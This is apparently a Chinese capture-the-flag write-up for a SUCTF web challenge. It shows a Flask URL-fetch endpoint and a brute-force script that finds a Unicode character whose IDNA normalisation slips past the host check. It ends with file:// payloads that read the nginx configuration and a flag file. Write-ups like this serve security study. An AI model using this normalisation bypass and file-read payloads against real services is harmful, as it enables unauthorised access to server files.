打开就是源码

@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
    url = request.args.get("url")
    host = parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return "我扌 your problem? 111"
    parts = list(urlsplit(url))
    host = parts[1]
    if host == 'suctf.cc':
        return "我扌 your problem? 222 " + host
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    #去掉 url 中的空格
    finalUrl = urlunsplit(parts).split(' ')[0]
    host = parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return urllib.request.urlopen(finalUrl).read()
    else:
        return "我扌 your problem? 333"

审计后知道，我们要绕过前面两个if执行第三个if进行读取文件。
第三个if判断前进行了编码和解码，我们要找到一个字符S，放入suctf.cS中，满足解码前不符合suctf.cS==suctf.cc,
解码后满足。
爆破脚本：

from urllib.parse import urlparse, urlunsplit, urlsplit
from urllib import parse

def outres():
	for x in range(10000):
		char = chr(x)
		url = "http://suctf.c{}".format(char)
		try:
			if checkurl(url):
				print("the char {}:{}:{} is available".format(x,chr(x),hex(x)))
		except:
			pass
def checkurl(url):
	url = url
	host = parse.urlparse(url).hostname
	if host == 'suctf.cc':
		return False
	parts = list(urlsplit(url))
	host = parts[1]
	if host == 'suctf.cc':
		return False
	newhost = []
	for h in host.split('.'):
		newhost.append(h.encode('idna').decode('utf-8'))
	parts[1] = '.'.join(newhost)
	res = urlunsplit(parts).split(' ')[0]
	host = parse.urlparse(res).hostname
	if host == 'suctf.cc':
		return True
	else:
		return False



if __name__ == '__main__':
	outres()

结果：

这里用 Ⅽ
Nginx配置:

配置文件存放目录：/etc/nginx
主配置文件：/etc/nginx/conf/nginx.conf
管理脚本：/usr/lib64/systemd/system/nginx.service
模块：/usr/lisb64/nginx/modules
应用程序：/usr/sbin/nginx
程序默认存放位置：/usr/share/nginx/html
日志默认存放位置：/var/log/nginx
配置文件目录为：/usr/local/nginx/conf/nginx.conf

payload:

getUrl?url=file://suctf.cⅭ/usr/local/nginx/conf/nginx.conf

看到了/usr/fffffflag

getUrl?url=file://suctf.cⅭ/usr/fffffflag